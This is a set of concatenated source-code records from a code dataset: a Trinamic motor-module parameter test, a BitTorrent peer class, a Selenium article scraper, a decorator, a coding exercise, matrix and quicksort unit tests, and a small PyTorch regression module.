module.APs.StartVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StartVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StopVelocity\", module.APs.StopVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StopVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RampWaitTime\", module.APs.RampWaitTime))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RampWaitTime, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"THIGH\", module.APs.THIGH))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.THIGH, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"VDCMIN\", module.APs.VDCMIN))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.VDCMIN, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"rightSwitchPolarity\", module.APs.rightSwitchPolarity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.rightSwitchPolarity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"leftSwitchPolarity\", module.APs.leftSwitchPolarity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.leftSwitchPolarity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"softstop\", module.APs.softstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.softstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HighSpeedChopperMode\", module.APs.HighSpeedChopperMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HighSpeedChopperMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HighSpeedFullstepMode\", module.APs.HighSpeedFullstepMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HighSpeedFullstepMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MeasuredSpeed\", module.APs.MeasuredSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MeasuredSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PowerDownRamp\", module.APs.PowerDownRamp))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PowerDownRamp, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RelativePositioningOptionCode\", module.APs.RelativePositioningOptionCode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RelativePositioningOptionCode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MicrostepResolution\", module.APs.MicrostepResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MicrostepResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperBlankTime\", module.APs.ChopperBlankTime))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperBlankTime, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ConstantTOffMode\", module.APs.ConstantTOffMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ConstantTOffMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"DisableFastDecayComparator\", module.APs.DisableFastDecayComparator))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.DisableFastDecayComparator, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperHysteresisEnd\", 
module.APs.ChopperHysteresisEnd))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperHysteresisEnd, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperHysteresisStart\", module.APs.ChopperHysteresisStart))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperHysteresisStart, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TOff\", module.APs.TOff))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TOff, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SEIMIN\", module.APs.SEIMIN))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SEIMIN, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SECDS\", module.APs.SECDS))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SECDS, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyHysteresis\", module.APs.smartEnergyHysteresis))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyHysteresis, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SECUS\", module.APs.SECUS))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SECUS, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyHysteresisStart\", module.APs.smartEnergyHysteresisStart))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyHysteresisStart, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SG2FilterEnable\", module.APs.SG2FilterEnable))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SG2FilterEnable, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SG2Threshold\", module.APs.SG2Threshold))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SG2Threshold, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ShortToGroundProtection\", module.APs.ShortToGroundProtection))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ShortToGroundProtection, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"VSense\", module.APs.VSense))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.VSense, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyActualCurrent\", module.APs.smartEnergyActualCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyActualCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyStallVelocity\", module.APs.smartEnergyStallVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyStallVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyThresholdSpeed\", module.APs.smartEnergyThresholdSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyThresholdSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RandomTOffMode\", module.APs.RandomTOffMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RandomTOffMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperSynchronization\", module.APs.ChopperSynchronization))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperSynchronization, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMThresholdSpeed\", 
module.APs.PWMThresholdSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMThresholdSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMGrad\", module.APs.PWMGrad))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMGrad, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMAmplitude\", module.APs.PWMAmplitude))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMAmplitude, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMScale\", module.APs.PWMScale))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMScale, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"pwmMode\", module.APs.pwmMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.pwmMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMFrequency\", module.APs.PWMFrequency))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMFrequency, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMAutoscale\", module.APs.PWMAutoscale))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMAutoscale, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ReferenceSearchMode\", module.APs.ReferenceSearchMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ReferenceSearchMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ReferenceSearchSpeed\", module.APs.ReferenceSearchSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ReferenceSearchSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RefSwitchSpeed\", module.APs.RefSwitchSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RefSwitchSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RightLimitSwitchPosition\", module.APs.RightLimitSwitchPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RightLimitSwitchPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LastReferencePosition\", module.APs.LastReferencePosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LastReferencePosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"encoderMode\", module.APs.encoderMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.encoderMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MotorFullStepResolution\", module.APs.MotorFullStepResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MotorFullStepResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"pwmSymmetric\", module.APs.pwmSymmetric))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.pwmSymmetric, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"FreewheelingMode\", module.APs.FreewheelingMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.FreewheelingMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LoadValue\", module.APs.LoadValue))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LoadValue, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"extendedErrorFlags\", module.APs.extendedErrorFlags))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.extendedErrorFlags, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) 
...\".format(\"DrvStatusFlags\", module.APs.DrvStatusFlags))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.DrvStatusFlags, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"EncoderPosition\", module.APs.EncoderPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.EncoderPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"EncoderResolution\", module.APs.EncoderResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.EncoderResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"max_EncoderDeviation\", module.APs.max_EncoderDeviation))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.max_EncoderDeviation, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PowerDownDelay\", module.APs.PowerDownDelay))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PowerDownDelay, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"UnitMode\", module.APs.UnitMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.UnitMode, AP_AXIS)))\n\nlogger.info(\"Test completed successfully.\")\n","sub_path":"PyTrinamicMicro/platforms/motionpy/tests/modules/TMCM1270/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":17886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"263543178","text":"__author__ = 'alexisgallepe'\n\nimport sys\nimport socket\nimport struct\nimport bitstring\nfrom bitstring import BitArray\nfrom pubsub import pub\nfrom . import utils\nimport threading\nimport logging\nfrom six import string_types\n\n\nclass Peer(object):\n def __init__(self, torrent, ip, port=6881):\n self.lastHandshakeAttempt = 0\n self.lock = threading.Lock()\n self.handshake = None\n self.hasHandshaked = False\n self.readBuffer = b\"\"\n self.counter = 10\n self.socket = None\n self.ip = ip\n self.port = port\n self.torrent = torrent\n self.socketsPeers = []\n\n self.state = {\n 'am_choking': True,\n 'am_interested': False,\n 'peer_choking': True,\n 'peer_interested': False,\n }\n\n self.idFunction = {\n 0: self.choke,\n 1: self.unchoke,\n 2: self.interested,\n 3: self.not_interested,\n 4: self.have,\n 5: self.bitfield,\n 6: self.request,\n 7: self.piece,\n 8: self.cancel,\n 9: self.portRequest\n }\n\n self.numberOfPieces = torrent.numberOfPieces\n self.bitField = bitstring.BitArray(self.numberOfPieces)\n\n def connectToPeer(self, timeout=10):\n try:\n self.socket = socket.create_connection((self.ip, self.port), timeout)\n logging.info(\"connected to peer ip: {0} - port: {1}\".format(self.ip, self.port))\n self.build_handshake()\n return True\n except Exception:\n logging.error(str(self.ip) + \": connectToPeer Socket Timeout Error\")\n pass\n return False\n\n def hasPiece(self, index):\n return self.bitField[index]\n\n def build_handshake(self):\n pstr = \"BitTorrent protocol\".encode('utf-8')\n reserved = \"0\" * 8\n hs = struct.pack(\"B\" + str(len(pstr)) + \"s8x20s20s\",\n len(pstr),\n pstr,\n # reserved,\n self.torrent.info_hash,\n self.torrent.peer_id\n )\n assert len(hs) == 49 + len(pstr)\n self.handshake = hs\n\n def build_interested(self):\n return struct.pack('!I', 1) + struct.pack('!B', 2)\n\n def build_request(self, index, offset, length):\n header = struct.pack('>I', 13)\n id = b'\\x06'\n\n if isinstance(length, (bytes, bytearray)):\n id = '\\x06'\n\n index = struct.pack('>I', index)\n offset = struct.pack('>I', offset)\n length = struct.pack('>I', length)\n request = header + id + index + offset + length\n\n return request\n\n def build_piece(self, index, offset, data):\n header = struct.pack('>I', 13)\n id = '\\x07'\n index = struct.pack('>I', index)\n offset = struct.pack('>I', offset)\n data = struct.pack('>I', data)\n piece = header + id + index + offset + data\n\n return piece\n\n def build_bitfield(self):\n length = struct.pack('>I', 4)\n id = '\\x05'\n bitfield = self.bitField.tobytes()\n bitfield = length + id + bitfield\n return bitfield\n\n def sendToPeer(self, msg):\n try:\n self.socket.send(msg)\n except Exception as e:\n logging.error(str(self.ip) + \": sendToPeer Error: \" + str(e))\n\n def checkHandshake(self, buf, pstr=\"BitTorrent protocol\"):\n if isinstance(buf, (bytes, bytearray)):\n pstr_rec = buf[1:20].decode('utf-8')\n else:\n pstr_rec = buf[1:20]\n\n if pstr_rec == pstr:\n handshake = buf[:68]\n expected_length, info_dict, info_hash, peer_id = struct.unpack(\n \"B\" + str(len(pstr)) + \"s8x20s20s\",\n handshake)\n\n if self.torrent.info_hash == info_hash:\n self.hasHandshaked = True\n # self.sendToPeer(self.build_bitfield())\n else:\n logging.warning(\"Error with peer's handshake\")\n\n self.readBuffer = self.readBuffer[28 + len(info_hash)+20:]\n\n def keep_alive(self, payload):\n try:\n keep_alive = struct.unpack(\"!I\", payload[:4])[0]\n if keep_alive == 0:\n logging.info('KEEP ALIVE')\n return True\n except 
Exception:\n pass\n\n return False\n\n def interested(self, payload=None):\n logging.info('interested')\n self.state['peer_interested'] = True\n\n def not_interested(self, payload=None):\n logging.info('not_interested')\n self.state['peer_interested'] = False\n\n def have(self, payload):\n index = utils.convertBytesToDecimal(payload)\n self.bitField[index] = True\n pub.sendMessage('RarestPiece.updatePeersBitfield', bitfield=self.bitField, peer=self)\n\n def bitfield(self, payload):\n self.bitField = BitArray(bytes=payload)\n logging.info('bitfield')\n pub.sendMessage('RarestPiece.updatePeersBitfield', bitfield=self.bitField, peer=self)\n\n def request(self, payload):\n piece_index = payload[:4]\n block_offset = payload[4:8]\n block_length = payload[8:]\n logging.info('request')\n pub.sendMessage('PiecesManager.PeerRequestsPiece', piece=(piece_index, block_offset, block_length), peer=self)\n\n def piece(self, payload):\n piece_index = utils.convertBytesToDecimal(payload[:4])\n piece_offset = utils.convertBytesToDecimal(payload[4:8])\n piece_data = payload[8:]\n pub.sendMessage('PiecesManager.Piece', piece=(piece_index, piece_offset, piece_data))\n\n def cancel(self, payload=None):\n logging.info('cancel')\n\n def portRequest(self, payload=None):\n logging.info('portRequest')\n\n def choke(self,payload=None):\n logging.info(\"choking peer: \" + str(self.ip))\n self.state['peer_choking'] = True\n\n def unchoke(self,payload=None):\n logging.info(\"Unchoking peer: \" + str(self.ip))\n pub.sendMessage('PeersManager.peerUnchoked',peer=self)\n self.state['peer_choking'] = False\n","sub_path":"academictorrents/Peer.py","file_name":"Peer.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
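The layout build_handshake packs is the standard 68-byte BitTorrent preamble: one length byte, the 19-byte protocol string, 8 reserved (zero) bytes, the 20-byte info hash, and the 20-byte peer id. A standalone pack/unpack round-trip of that format, with dummy hashes rather than real torrent data:

import struct

pstr = b"BitTorrent protocol"
info_hash = b"\x11" * 20              # dummy value for illustration
peer_id = b"-PY0001-000000000000"     # dummy 20-byte peer id

hs = struct.pack("B19s8x20s20s", len(pstr), pstr, info_hash, peer_id)
assert len(hs) == 49 + len(pstr)      # 68 bytes, as the class asserts

length, proto, rx_hash, rx_peer = struct.unpack("B19s8x20s20s", hs)
assert proto == pstr and rx_hash == info_hash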
+{"seq_id":"527464564","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom apps.news_scraper.models import Article\n\ndef extract_news_content(pk):\n if Article.objects.filter(pk=pk).exists():\n \n article_obj = Article.objects.get(pk=pk)\n\n try :\n\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options, executable_path=\"/usr/bin/geckodriver\")\n\n driver.get(f\"about:reader?url={article_obj.url}\")\n timeout = 10\n\n WebDriverWait(driver, timeout).until(lambda driver: driver.find_element_by_css_selector('h1.reader-title').get_attribute(\"innerHTML\") != \"\")\n # title = driver.find_element_by_css_selector(\"h1.reader-title\").get_attribute(\"innerHTML\")\n # author = driver.find_element_by_css_selector('div[class=\"credits reader-credits\"]').get_attribute(\"innerHTML\")\n article = driver.find_element_by_css_selector('div.content').get_attribute(\"innerHTML\")\n\n soup = BeautifulSoup(article, \"html.parser\")\n images = [image['src'] for image in soup.select(\"img\")]\n for elem in soup.select(\"img\"):\n elem.extract()\n\n hyperlinks = [{'title': link.text, 'url': link['href']} for link in soup.find_all('a', href=True)]\n\n \n article_obj.content = soup.text\n article_obj.images = images\n article_obj.hyperlinks = hyperlinks\n article_obj.status = 'completed'\n article_obj.save()\n\n driver.quit()\n\n return True\n\n except Exception as e :\n print(e)\n return None\n\n else :\n return False\n","sub_path":"picard/apps/news_scraper/scraper/article_scraper.py","file_name":"article_scraper.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"57947750","text":"import functools\n\nfrom slu import constants as const\n\n\ndef task_guard(func):\n def wrapper(self, task_name: str, *args, **kwargs):\n supported_tasks = {const.CLASSIFICATION, const.NER}\n\n if task_name not in supported_tasks:\n raise ValueError(f\"Task should be one of {supported_tasks}\")\n\n use_task = self.task_by_name(task_name).use\n\n if use_task:\n value = func(self, task_name,*args, **kwargs)\n return value\n else:\n return None\n return wrapper\n","sub_path":"slu/slu/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"631948984","text":"'''\nInput: a List of integers where every int except one shows up twice\nReturns: an integer\n'''\ndef single_number(arr):\n # Your code here\n # iterate through array, checking each element\n # against its neighboring element\n # This will require us to use i and i+1\n\n # start by sorting our array\n arr = sorted(arr)\n \n # iterate through our array with a step of 2\n for i in range(0, len(arr), 2):\n # compare value at index i to value at \n # index i + 1 to determine if they're the same\n try:\n if arr[i] != arr[i + 1]:\n # in this case there is only one\n # possible scenario; the value at \n # index i must be the odd number out\n return arr[i]\n\n # If an IndexError exception is thrown, that means\n # we have reached the second to last element of \n # our array without finding the odd number out; because\n # this means there is only one number left to check, \n # we can conclude that the value in the last index of\n # the array will be the odd number out, so we return\n # the value at that index\n except(IndexError):\n return arr[-1]\n\n\nif __name__ == '__main__':\n # Use the main function to test your implementation\n arr = [1, 1, 4, 4, 5, 5, 3, 3, 9, 0, 0]\n\n print(f\"The odd-number-out is {single_number(arr)}\")","sub_path":"single_number/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"264232472","text":"import random\nimport unittest\n\nimport time\n\nfrom week1.matrix import Matrix\nfrom week1.quick_sort import quick_sort\n\n\nclass TestMatrix(unittest.TestCase):\n def test_create(self):\n self.assertRaises(TypeError, Matrix, 1)\n self.assertRaises(TypeError, Matrix, 'asdf')\n self.assertRaises(TypeError, Matrix, [1, 2, 3])\n self.assertRaises(TypeError, Matrix, [[1, 2, 3], [1, 2]])\n\n a = [[1, 2],\n [2, 3]]\n try:\n Matrix(a)\n except Exception as e:\n self.fail('Matrix initialization is failed for {0}: {1}'.format(a, e))\n\n def test_add(self):\n a = [[1, 2],\n [2, 1]]\n b = [[0, -1],\n [1, 2]]\n c = [[1, 1],\n [3, 3]]\n self.assertEqual(Matrix(a) + Matrix(b), Matrix(c))\n self.assertEqual(Matrix(b) + Matrix(a), Matrix(c))\n\n d = [[0, -1],\n [1, 2],\n [0, 0]]\n\n with self.assertRaises(IndexError):\n Matrix(a) + Matrix(d)\n\n def test_add_negative(self):\n a = Matrix([[0, 0],\n [0, 1]])\n with self.assertRaises(TypeError):\n a + 1\n with self.assertRaises(TypeError):\n a + [[0], [1]]\n with self.assertRaises(TypeError):\n a + 'sdfs'\n\n\n def test_mul_sq(self):\n a = Matrix([[1, 2], [2, 3]])\n b = Matrix([[1, 0], [0, 1]])\n\n self.assertEqual(a * b, a)\n self.assertEqual(b * b, b)\n\n def test_mul_no_sq(self):\n a = [[1, 2, 3],\n [-3, 2, 1]]\n b = [[1, 2],\n [-2, -1],\n [1, 0]]\n c1 = [[0, 0], [-6, -8]]\n c2 = [[-5, 6, 5], [1, -6, -7], [1, 2, 3]]\n self.assertEqual(Matrix(a) * Matrix(b), Matrix(c1))\n self.assertEqual(Matrix(b) * Matrix(a), Matrix(c2))\n\n def test_mul_no_sq_negative(self):\n a = [[1, 2, 3],\n [-3, 2, 1]]\n b = [[1, 2],\n [-2, -1],\n [1, 0],\n [0, 2]]\n with self.assertRaises(IndexError):\n Matrix(a) * Matrix(b)\n try:\n Matrix(b) * Matrix(a)\n except IndexError:\n self.fail('Index error on multiplying {0} on {1}'.format(b, a))\n\n def test_mul_int(self):\n a = [[2, 1, 3],\n [-1, 1, 0]]\n b = [[6, 3, 9],\n [-3, 3, 0]]\n self.assertEqual(Matrix(a) * 3, Matrix(b))\n self.assertEqual(3 * Matrix(a), Matrix(b))\n\n def test_mul_negative(self):\n a = Matrix([[1, 2], [2, 3]])\n\n with self.assertRaises(TypeError):\n a * [[1, 2]]\n with self.assertRaises(TypeError):\n a * 'test'\n\n def test_identity(self):\n identity_arr = [[0] * 5 for _ in xrange(5)]\n for i in xrange(len(identity_arr)):\n identity_arr[i][i] = 1\n self.assertEqual(Matrix.Identity(5), Matrix(identity_arr))\n\n def test_zeros(self):\n zeros_arr = [[0] * 5 for _ in xrange(7)]\n self.assertEqual(Matrix.Zeros(5, 7), Matrix(zeros_arr))\n\n\nclass TestQuickSort(unittest.TestCase):\n def test_empty(self):\n self.assertEqual(quick_sort([]), [])\n\n def test_len_1(self):\n self.assertEqual(quick_sort([1]), [1])\n\n def test_len_2(self):\n self.assertEqual(quick_sort([2, 1]), [1, 2])\n\n def test_len_3(self):\n self.assertEqual(quick_sort([3, 2, 1]), [1, 2, 3])\n\n def test_len_4(self):\n self.assertEqual(quick_sort([4, 3, 2, 1]), [1, 2, 3, 4])\n\n def test_len_5(self):\n self.assertEqual(quick_sort([5, 4, 3, 2, 1]), [1, 2, 3, 4, 5])\n\n def test_sort(self):\n for i in xrange(10):\n array = [random.randint(-1000, 1000) for _ in xrange(1500)]\n self.assertEqual(quick_sort(array), sorted(array))\n\n def test_time(self):\n array = [random.randint(-10000, 10000) for _ in xrange(15000)]\n start = time.time()\n quick_sort(array)\n end_time = time.time() - start\n self.assertTrue(end_time < 1)\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"week1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"209240002","text":"import numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\n\n\n\nclass NN(object):\n def __init__(self, in_dim, out_dim, lr):\n\n self.model_nn = torch.nn.Sequential( # neuronale Netzwerk\n torch.nn.Linear(in_dim, 20),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(20,20),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(20, out_dim)\n )\n\n self.criterion = torch.nn.MSELoss()\n self.optimizer = optim.SGD(self.model_nn.parameters(), lr=lr, momentum=0.9)\n\n def set_discretizations(self, state_disc, action_disc):\n self.state_disc = state_disc\n self.action_disc = action_disc\n\n '''\n Train the network\n param x: state action pairs, that are the input for the network\n as numpy matrix - samples x feature-dim\n param y: state, that shall be predicted by the network\n as numpy matrix - samples x feature-dim\n param N: how often the training shall iterate over the dataset\n '''\n def train(self, x, y, N):\n # TODO: This could probably be done prettier:\n # transform to torch dataset:\n x_dim = x.shape[1] # To reconstruct parts of tensor later\n data_in = TensorDataset(torch.tensor(np.append(x, y, 1),\n dtype=torch.float))\n loader = DataLoader(data_in, batch_size=8, shuffle=True)\n\n # Training:\n for epoch in range(N): # loop over the dataset multiple times\n for i, data in enumerate(loader, 0):\n\n # zero the parameter gradients\n self.optimizer.zero_grad()\n\n # extract features and labels:\n x = data[0][:, :x_dim] # data is a list with 1 entry -> [0]\n y = data[0][:, x_dim:]\n\n # forward + backward + optimize\n prediction = self.model_nn(x)\n loss = self.criterion(prediction, y) # s solls weden, das weiß man\n loss.backward()\n self.optimizer.step()\n\n def validate(self, x, y): # only for neural net that learns dynamics\n prediction = self.model_nn(torch.tensor(x, dtype=torch.float))\n loss = self.criterion(prediction, torch.tensor(y, dtype=torch.float))\n return loss.item()\n\n def dynamics_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n s_new = self.model_nn(sa).detach().numpy()\n return self.state_disc.discretize(s_new).astype(int)[0,:]\n\n\n def stochastic_dynamics_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n s_new = self.model_nn(sa).detach().numpy()\n s_new_bins, s_new_weights = self.state_disc.discretize_normal(s_new)\n\n \n\n def reward_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n r = self.model_nn(sa).detach().numpy()[0,0]\n return r\n\nclass LinearRegression(object):\n #def __init__(self):\n\n def train(self, sa, r, s):\n self.beta_s = np.linalg.lstsq(sa, s, rcond=-1)[0]\n self.beta_r = np.linalg.lstsq(sa, r, rcond=-1)[0]\n\n\n def validate(self, sa, r, s):\n mse_s = np.power((sa*self.beta_s-s),2).sum()/sa.shape[0]\n mse_r = np.power((sa*self.beta_r-r),2).sum()/sa.shape[0]\n return mse_r, mse_s\n\n def predict_r(self, sa):\n return sa*self.beta_r\n\n def reward_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n r = linear.predict_r(sa)\n return r # muss nicht diskretisiert 
werden\n","sub_path":"Challenge1/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
